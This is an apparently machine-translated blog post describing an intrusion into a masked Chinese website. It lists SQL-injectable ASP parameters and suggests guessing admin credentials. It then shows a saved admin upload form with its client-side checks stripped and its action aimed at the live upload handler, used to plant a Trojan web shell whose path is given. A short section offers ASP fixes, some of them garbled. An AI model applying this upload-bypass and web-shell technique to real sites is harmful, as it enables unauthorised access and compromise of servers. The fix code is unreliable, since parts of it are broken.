Flaw0rs Blog
Server address: http://www.xxxxxx.cn/
Vulnerability files on the server:
/Proshow. asp? Classname =
/Newlist. asp? Newid =
/Prolist. asp? Proid =
/Order. asp? Proid =
You can guess the administrator username and password.
The upload function is available in the background:
Its judgment on the legitimacy of the uploaded files is local:
Save the page for adding news to the local device and modify the restricted code for uploading files: The following is the modified Code.
<! Doctype html public "-// W3C // dtd html 4.0 Transitional // EN">
<! -- Saved from url = (0049) http://www.xxxx.cn/admin/products/picture.asp -->
<HTML> <HEAD> <TITLE> upload an image </TITLE>
<META. http-equiv = Content-Type c> <LINK
Href = "picture. files/style.css" type = text/css rel = stylesheet>
<SCRIPT. language = javascript>
// Delete the Restricted Code
</SCRIPT>
<META. c name = GENERATOR> </HEAD>
<BODY bgColor = # cedbff leftMargin = 0 topMargin = 0>
<TABLE cellSpacing = 0 cellPadding = 0 width = "100%" align = center border = 0>
<FORM. language = javascript. name = myform
Action = http://www.xxxxx.cn/admin/products/upfile.aspmethod=post encType = multipart/form-data>
// Modify the submission address
<TBODY>
<TR vAlign = center align = middle>
<TD align = left height = 15> <INPUT type = file size = 15 name = file1> <INPUT class = "txt" type = submit value = upload name = B1 isshowprocessbar =" true ">
</TD> </TR> </FORM> </TBODY> </TABLE> </BODY> </HTML>
In this way, we can directly upload our Trojan.
Http://www.xxxxxxx.cn/pic/flaw0r.txt
Fix Vulnerabilities
1./proshow. asp? Classname =
<%
Classname = replace (request ("classname "),"","")
If classname = "" then
Set rs = server. CreateObject ("adodb. recordset ")
Rs. open "select * from products order by proid desc", conn, 1, 1
%>
2./newlist. asp? Newid =
<%
Set res = Server. CreateObject ("ADODB. RecordSet ")
SQL = "select * from news where newid =" & Cint (request ("newID "))
Res. Open SQL, conn, 1, 1
%>
3./prolist. asp? Proid =
<%
Set res = Server. CreateObject ("ADODB. RecordSet ")
SQL = "select * from products where proid =" & Cint (request ("proID "))
Res. Open SQL, conn, 1, 1
%>
4./order. asp? Proid =
<%
Set res = Server. CreateObject ("ADODB. RecordSet ")
SQL = "select * from products where proid =" & Cint (request ("proID "))
Res. Open SQL, conn, 1, 1
%>
This article is not malicious. Please kindly advise me. Thank you!